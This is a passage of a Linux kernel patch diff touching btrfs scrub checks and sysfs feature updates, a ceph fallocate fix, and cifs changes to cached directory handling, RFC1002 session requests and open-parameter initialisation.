+@@ -2053,20 +2053,33 @@ static int scrub_checksum_tree_block(struct scrub_block *sblock)
+ 	 * a) don't have an extent buffer and
+ 	 * b) the page is already kmapped
+ 	 */
+-	if (sblock->logical != btrfs_stack_header_bytenr(h))
++	if (sblock->logical != btrfs_stack_header_bytenr(h)) {
+ 		sblock->header_error = 1;
+-
+-	if (sector->generation != btrfs_stack_header_generation(h)) {
+-		sblock->header_error = 1;
+-		sblock->generation_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad bytenr, has %llu want %llu",
++			      sblock->logical, sblock->mirror_num,
++			      btrfs_stack_header_bytenr(h),
++			      sblock->logical);
++		goto out;
+ 	}
+ 
+-	if (!scrub_check_fsid(h->fsid, sector))
++	if (!scrub_check_fsid(h->fsid, sector)) {
+ 		sblock->header_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad fsid, has %pU want %pU",
++			      sblock->logical, sblock->mirror_num,
++			      h->fsid, sblock->dev->fs_devices->fsid);
++		goto out;
++	}
+ 
+-	if (memcmp(h->chunk_tree_uuid, fs_info->chunk_tree_uuid,
+-		   BTRFS_UUID_SIZE))
++	if (memcmp(h->chunk_tree_uuid, fs_info->chunk_tree_uuid, BTRFS_UUID_SIZE)) {
+ 		sblock->header_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad chunk tree uuid, has %pU want %pU",
++			      sblock->logical, sblock->mirror_num,
++			      h->chunk_tree_uuid, fs_info->chunk_tree_uuid);
++		goto out;
++	}
+ 
+ 	shash->tfm = fs_info->csum_shash;
+ 	crypto_shash_init(shash);
+@@ -2079,9 +2092,27 @@ static int scrub_checksum_tree_block(struct scrub_block *sblock)
+ 	}
+ 
+ 	crypto_shash_final(shash, calculated_csum);
+-	if (memcmp(calculated_csum, on_disk_csum, sctx->fs_info->csum_size))
++	if (memcmp(calculated_csum, on_disk_csum, sctx->fs_info->csum_size)) {
+ 		sblock->checksum_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad csum, has " CSUM_FMT " want " CSUM_FMT,
++			      sblock->logical, sblock->mirror_num,
++			      CSUM_FMT_VALUE(fs_info->csum_size, on_disk_csum),
++			      CSUM_FMT_VALUE(fs_info->csum_size, calculated_csum));
++		goto out;
++	}
++
++	if (sector->generation != btrfs_stack_header_generation(h)) {
++		sblock->header_error = 1;
++		sblock->generation_error = 1;
++		btrfs_warn_rl(fs_info,
++		"tree block %llu mirror %u has bad generation, has %llu want %llu",
++			      sblock->logical, sblock->mirror_num,
++			      btrfs_stack_header_generation(h),
++			      sector->generation);
++	}
+ 
++out:
+ 	return sblock->header_error || sblock->checksum_error;
+ }
+ 
+diff --git a/fs/btrfs/sysfs.c b/fs/btrfs/sysfs.c
+index 45615ce364988..108aa38761860 100644
+--- a/fs/btrfs/sysfs.c
++++ b/fs/btrfs/sysfs.c
+@@ -2272,36 +2272,23 @@ void btrfs_sysfs_del_one_qgroup(struct btrfs_fs_info *fs_info,
+  * Change per-fs features in /sys/fs/btrfs/UUID/features to match current
+  * values in superblock. Call after any changes to incompat/compat_ro flags
+  */
+-void btrfs_sysfs_feature_update(struct btrfs_fs_info *fs_info,
+-		u64 bit, enum btrfs_feature_set set)
++void btrfs_sysfs_feature_update(struct btrfs_fs_info *fs_info)
+ {
+-	struct btrfs_fs_devices *fs_devs;
+ 	struct kobject *fsid_kobj;
+-	u64 __maybe_unused features;
+-	int __maybe_unused ret;
++	int ret;
+ 
+ 	if (!fs_info)
+ 		return;
+ 
+-	/*
+-	 * See 14e46e04958df74 and e410e34fad913dd, feature bit updates are not
+-	 * safe when called from some contexts (eg. balance)
+-	 */
+-	features = get_features(fs_info, set);
+-	ASSERT(bit & supported_feature_masks[set]);
+-
+-	fs_devs = fs_info->fs_devices;
+-	fsid_kobj = &fs_devs->fsid_kobj;
+-
++	fsid_kobj = &fs_info->fs_devices->fsid_kobj;
+ 	if (!fsid_kobj->state_initialized)
+ 		return;
+ 
+-	/*
+-	 * FIXME: this is too heavy to update just one value, ideally we'd like
+-	 * to use sysfs_update_group but some refactoring is needed first.
+-	 */
+-	sysfs_remove_group(fsid_kobj, &btrfs_feature_attr_group);
+-	ret = sysfs_create_group(fsid_kobj, &btrfs_feature_attr_group);
++	ret = sysfs_update_group(fsid_kobj, &btrfs_feature_attr_group);
++	if (ret < 0)
++		btrfs_warn(fs_info,
++			   "failed to update /sys/fs/btrfs/%pU/features: %d",
++			   fs_info->fs_devices->fsid, ret);
+ }
+ 
+ int __init btrfs_init_sysfs(void)
+diff --git a/fs/btrfs/sysfs.h b/fs/btrfs/sysfs.h
+index bacef43f72672..86c7eef128731 100644
+--- a/fs/btrfs/sysfs.h
++++ b/fs/btrfs/sysfs.h
+@@ -19,8 +19,7 @@ void btrfs_sysfs_remove_device(struct btrfs_device *device);
+ int btrfs_sysfs_add_fsid(struct btrfs_fs_devices *fs_devs);
+ void btrfs_sysfs_remove_fsid(struct btrfs_fs_devices *fs_devs);
+ void btrfs_sysfs_update_sprout_fsid(struct btrfs_fs_devices *fs_devices);
+-void btrfs_sysfs_feature_update(struct btrfs_fs_info *fs_info,
+-		u64 bit, enum btrfs_feature_set set);
++void btrfs_sysfs_feature_update(struct btrfs_fs_info *fs_info);
+ void btrfs_kobject_uevent(struct block_device *bdev, enum kobject_action action);
+ 
+ int __init btrfs_init_sysfs(void);
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index b8c52e89688c8..8f8d0fce6e4a3 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -2464,6 +2464,11 @@ int btrfs_commit_transaction(struct btrfs_trans_handle *trans)
+ 	wake_up(&fs_info->transaction_wait);
+ 	btrfs_trans_state_lockdep_release(fs_info, BTRFS_LOCKDEP_TRANS_UNBLOCKED);
+ 
++	/* If we have features changed, wake up the cleaner to update sysfs. */
++	if (test_bit(BTRFS_FS_FEATURE_CHANGED, &fs_info->flags) &&
++	    fs_info->cleaner_kthread)
++		wake_up_process(fs_info->cleaner_kthread);
++
+ 	ret = btrfs_write_and_wait_transaction(trans);
+ 	if (ret) {
+ 		btrfs_handle_fs_error(fs_info, ret,
+diff --git a/fs/ceph/file.c b/fs/ceph/file.c
+index b5cff85925a10..dc39a4b0ec8ec 100644
+--- a/fs/ceph/file.c
++++ b/fs/ceph/file.c
+@@ -2102,6 +2102,9 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	loff_t endoff = 0;
+ 	loff_t size;
+ 
++	dout("%s %p %llx.%llx mode %x, offset %llu length %llu\n", __func__,
++	     inode, ceph_vinop(inode), mode, offset, length);
++
+ 	if (mode != (FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE))
+ 		return -EOPNOTSUPP;
+ 
+@@ -2136,6 +2139,10 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	if (ret < 0)
+ 		goto unlock;
+ 
++	ret = file_modified(file);
++	if (ret)
++		goto put_caps;
++
+ 	filemap_invalidate_lock(inode->i_mapping);
+ 	ceph_fscache_invalidate(inode, false);
+ 	ceph_zero_pagecache_range(inode, offset, length);
+@@ -2151,6 +2158,7 @@ static long ceph_fallocate(struct file *file, int mode,
+ 	}
+ 	filemap_invalidate_unlock(inode->i_mapping);
+ 
++put_caps:
+ 	ceph_put_cap_refs(ci, got);
+ unlock:
+ 	inode_unlock(inode);
+diff --git a/fs/cifs/cached_dir.c b/fs/cifs/cached_dir.c
+index 60399081046a5..75d5e06306ea5 100644
+--- a/fs/cifs/cached_dir.c
++++ b/fs/cifs/cached_dir.c
+@@ -14,6 +14,7 @@
+ 
+ static struct cached_fid *init_cached_dir(const char *path);
+ static void free_cached_dir(struct cached_fid *cfid);
++static void smb2_close_cached_fid(struct kref *ref);
+ 
+ static struct cached_fid *find_or_create_cached_dir(struct cached_fids *cfids,
+ 						    const char *path,
+@@ -181,12 +182,13 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE);
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.fid = pfid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_FILE),
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.fid = pfid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -220,8 +222,8 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		}
+ 		goto oshr_free;
+ 	}
+-
+-	atomic_inc(&tcon->num_remote_opens);
++	cfid->tcon = tcon;
++	cfid->is_open = true;
+ 
+ 	o_rsp = (struct smb2_create_rsp *)rsp_iov[0].iov_base;
+ 	oparms.fid->persistent_fid = o_rsp->PersistentFileId;
+@@ -233,12 +235,12 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 	if (o_rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
+ 		goto oshr_free;
+ 
+-
+ 	smb2_parse_contexts(server, o_rsp,
+ 			    &oparms.fid->epoch,
+ 			    oparms.fid->lease_key, &oplock,
+ 			    NULL, NULL);
+-
++	if (!(oplock & SMB2_LEASE_READ_CACHING_HE))
++		goto oshr_free;
+ 	qi_rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
+ 	if (le32_to_cpu(qi_rsp->OutputBufferLength) < sizeof(struct smb2_file_all_info))
+ 		goto oshr_free;
+@@ -259,9 +261,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		}
+ 	}
+ 	cfid->dentry = dentry;
+-	cfid->tcon = tcon;
+ 	cfid->time = jiffies;
+-	cfid->is_open = true;
+ 	cfid->has_lease = true;
+ 
+ oshr_free:
+@@ -271,7 +271,7 @@ oshr_free:
+ 	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
+ 	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
+ 	spin_lock(&cfids->cfid_list_lock);
+-	if (!cfid->has_lease) {
++	if (rc && !cfid->has_lease) {
+ 		if (cfid->on_list) {
+ 			list_del(&cfid->entry);
+ 			cfid->on_list = false;
+@@ -280,13 +280,27 @@ oshr_free:
+ 		rc = -ENOENT;
+ 	}
+ 	spin_unlock(&cfids->cfid_list_lock);
++	if (!rc && !cfid->has_lease) {
++		/*
++		 * We are guaranteed to have two references at this point.
++		 * One for the caller and one for a potential lease.
++		 * Release the Lease-ref so that the directory will be closed
++		 * when the caller closes the cached handle.
++		 */
++		kref_put(&cfid->refcount, smb2_close_cached_fid);
++	}
+ 	if (rc) {
++		if (cfid->is_open)
++			SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
++				   cfid->fid.volatile_fid);
+ 		free_cached_dir(cfid);
+ 		cfid = NULL;
+ 	}
+ 
+-	if (rc == 0)
++	if (rc == 0) {
+ 		*ret_cfid = cfid;
++		atomic_inc(&tcon->num_remote_opens);
++	}
+ 
+ 	return rc;
+ }
+@@ -335,6 +349,7 @@ smb2_close_cached_fid(struct kref *ref)
+ 	if (cfid->is_open) {
+ 		SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+ 			   cfid->fid.volatile_fid);
++		atomic_dec(&cfid->tcon->num_remote_opens);
+ 	}
+ 
+ 	free_cached_dir(cfid);
+diff --git a/fs/cifs/cifsacl.c b/fs/cifs/cifsacl.c
+index bbf58c2439da2..3cc3471199f54 100644
+--- a/fs/cifs/cifsacl.c
++++ b/fs/cifs/cifsacl.c
+@@ -1428,14 +1428,15 @@ static struct cifs_ntsd *get_cifs_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 	tcon = tlink_tcon(tlink);
+ 	xid = get_xid();
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = READ_CONTROL;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = READ_CONTROL,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (!rc) {
+@@ -1494,14 +1495,15 @@ int set_cifs_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+ 	else
+ 		access_flags = WRITE_DAC;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = access_flags;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc) {
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index 1207b39686fb9..e75184544ecb4 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -670,11 +670,21 @@ static inline int get_dfs_path(const unsigned int xid, struct cifs_ses *ses,
+ int match_target_ip(struct TCP_Server_Info *server,
+ 		    const char *share, size_t share_len,
+ 		    bool *result);
+-
+-int cifs_dfs_query_info_nonascii_quirk(const unsigned int xid,
+-				       struct cifs_tcon *tcon,
+-				       struct cifs_sb_info *cifs_sb,
+-				       const char *dfs_link_path);
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink);
++#else
++static inline int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	*islink = false;
++	return 0;
++}
+ #endif
+ 
+ static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+index 23f10e0d6e7e3..8c014a3ff9e00 100644
+--- a/fs/cifs/cifssmb.c
++++ b/fs/cifs/cifssmb.c
+@@ -5372,14 +5372,15 @@ CIFSSMBSetPathInfoFB(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_fid fid;
+ 	int rc;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = fileName;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = fileName,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index b2a04b4e89a5e..af49ae53aaf40 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -2843,72 +2843,48 @@ ip_rfc1001_connect(struct TCP_Server_Info *server)
+ 	 * negprot - BB check reconnection in case where second
+ 	 * sessinit is sent but no second negprot
+ 	 */
+-	struct rfc1002_session_packet *ses_init_buf;
+-	unsigned int req_noscope_len;
+-	struct smb_hdr *smb_buf;
++	struct rfc1002_session_packet req = {};
++	struct smb_hdr *smb_buf = (struct smb_hdr *)&req;
++	unsigned int len;
+ 
+-	ses_init_buf = kzalloc(sizeof(struct rfc1002_session_packet),
+-			       GFP_KERNEL);
++	req.trailer.session_req.called_len = sizeof(req.trailer.session_req.called_name);
+ 
+-	if (ses_init_buf) {
+-		ses_init_buf->trailer.session_req.called_len = 32;
++	if (server->server_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      server->server_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      DEFAULT_CIFS_CALLED_NAME,
++			      RFC1001_NAME_LEN_WITH_NULL);
+ 
+-		if (server->server_RFC1001_name[0] != 0)
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.called_name,
+-				      server->server_RFC1001_name,
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-		else
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.called_name,
+-				      DEFAULT_CIFS_CALLED_NAME,
+-				      RFC1001_NAME_LEN_WITH_NULL);
++	req.trailer.session_req.calling_len = sizeof(req.trailer.session_req.calling_name);
+ 
+-		ses_init_buf->trailer.session_req.calling_len = 32;
++	/* calling name ends in null (byte 16) from old smb convention */
++	if (server->workstation_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      server->workstation_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      "LINUX_CIFS_CLNT",
++			      RFC1001_NAME_LEN_WITH_NULL);
+ 
+-		/*
+-		 * calling name ends in null (byte 16) from old smb
+-		 * convention.
+-		 */
+-		if (server->workstation_RFC1001_name[0] != 0)
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.calling_name,
+-				      server->workstation_RFC1001_name,
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-		else
+-			rfc1002mangle(ses_init_buf->trailer.
+-				      session_req.calling_name,
+-				      "LINUX_CIFS_CLNT",
+-				      RFC1001_NAME_LEN_WITH_NULL);
+-
+-		ses_init_buf->trailer.session_req.scope1 = 0;
+-		ses_init_buf->trailer.session_req.scope2 = 0;
+-		smb_buf = (struct smb_hdr *)ses_init_buf;
+-
+-		/* sizeof RFC1002_SESSION_REQUEST with no scopes */
+-		req_noscope_len = sizeof(struct rfc1002_session_packet) - 2;
+-
+-		/* == cpu_to_be32(0x81000044) */
+-		smb_buf->smb_buf_length =
+-			cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | req_noscope_len);
+-		rc = smb_send(server, smb_buf, 0x44);
+-		kfree(ses_init_buf);
+-		/*
+-		 * RFC1001 layer in at least one server
+-		 * requires very short break before negprot
+-		 * presumably because not expecting negprot
+-		 * to follow so fast.  This is a simple
+-		 * solution that works without
+-		 * complicating the code and causes no
+-		 * significant slowing down on mount
+-		 * for everyone else
+-		 */
+-		usleep_range(1000, 2000);
+-	}
+ 	/*
+-	 * else the negprot may still work without this
+-	 * even though malloc failed
++	 * As per rfc1002, @len must be the number of bytes that follows the
++	 * length field of a rfc1002 session request payload.
++	 */
++	len = sizeof(req) - offsetof(struct rfc1002_session_packet, trailer.session_req);
++
++	smb_buf->smb_buf_length = cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | len);
++	rc = smb_send(server, smb_buf, len);
++	/*
++	 * RFC1001 layer in at least one server requires very short break before
++	 * negprot presumably because not expecting negprot to follow so fast.
++	 * This is a simple solution that works without complicating the code
++	 * and causes no significant slowing down on mount for everyone else
+ 	 */
++	usleep_range(1000, 2000);
+ 
+ 	return rc;
+ }
+diff --git a/fs/cifs/dir.c b/fs/cifs/dir.c
+index ad4208bf1e321..1bf61778f44c6 100644
+--- a/fs/cifs/dir.c
++++ b/fs/cifs/dir.c
+@@ -304,15 +304,16 @@ static int cifs_do_create(struct inode *inode, struct dentry *direntry, unsigned
+ 	if (!tcon->unix_ext && (mode & S_IWUGO) == 0)
+ 		create_options |= CREATE_OPTION_READONLY;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
+-	oparms.mode = mode;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++		.mode = mode,
++	};
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+ 	if (rc) {
+ 		cifs_dbg(FYI, "cifs_create returned 0x%x\n", rc);
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index b8d1cbadb6897..a53ddc81b698c 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -260,14 +260,15 @@ static int cifs_nt_open(const char *full_path, struct inode *inode, struct cifs_
+ 	if (f_flags & O_DIRECT)
+ 		create_options |= CREATE_NO_BUFFER;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = fid,
++	};
+ 
+ 	rc = server->ops->open(xid, &oparms, oplock, buf);
+ 	if (rc)
+@@ -848,14 +849,16 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush)
+ 	if (server->ops->get_lease_key)
+ 		server->ops->get_lease_key(inode, &cfile->fid);
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = desired_access;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.disposition = disposition;
+-	oparms.path = full_path;
+-	oparms.fid = &cfile->fid;
+-	oparms.reconnect = true;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = desired_access,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.disposition = disposition,
++		.path = full_path,
++		.fid = &cfile->fid,
++		.reconnect = true,
++	};
+ 
+ 	/*
+ 	 * Can not refresh inode by passing in file_info buf to be returned by
+diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c
+index f145a59af89be..7d0cc39d2921f 100644
+--- a/fs/cifs/inode.c
++++ b/fs/cifs/inode.c
+@@ -508,14 +508,15 @@ cifs_sfu_type(struct cifs_fattr *fattr, const char *path,
+ 		return PTR_ERR(tlink);
+ 	tcon = tlink_tcon(tlink);
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+@@ -1518,14 +1519,15 @@ cifs_rename_pending_delete(const char *full_path, struct dentry *dentry,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = DELETE | FILE_WRITE_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = DELETE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc != 0)
+@@ -2112,15 +2114,16 @@ cifs_do_rename(const unsigned int xid, struct dentry *from_dentry,
+ 	if (to_dentry->d_parent != from_dentry->d_parent)
+ 		goto do_rename_exit;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	/* open the file to be renamed -- we need DELETE perms */
+-	oparms.desired_access = DELETE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = from_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		/* open the file to be renamed -- we need DELETE perms */
++		.desired_access = DELETE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = from_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc == 0) {
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+index a5a097a699837..d937eedd74fb6 100644
+--- a/fs/cifs/link.c
++++ b/fs/cifs/link.c
+@@ -271,14 +271,15 @@ cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	int buf_type = CIFS_NO_BUFFER;
+ 	FILE_ALL_INFO file_info;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, &file_info);
+ 	if (rc)
+@@ -313,14 +314,15 @@ cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_open_parms oparms;
+ 	struct cifs_io_parms io_parms = {0};
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+@@ -355,13 +357,14 @@ smb3_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+ 	struct smb2_file_all_info *pfile_info = NULL;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_READ;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_READ,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.fid = &fid,
++	};
+ 
+ 	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+ 	if (utf16_path == NULL)
+@@ -421,14 +424,15 @@ smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!utf16_path)
+ 		return -ENOMEM;
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
+-	oparms.mode = 0644;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_CREATE,
++		.fid = &fid,
++		.mode = 0644,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
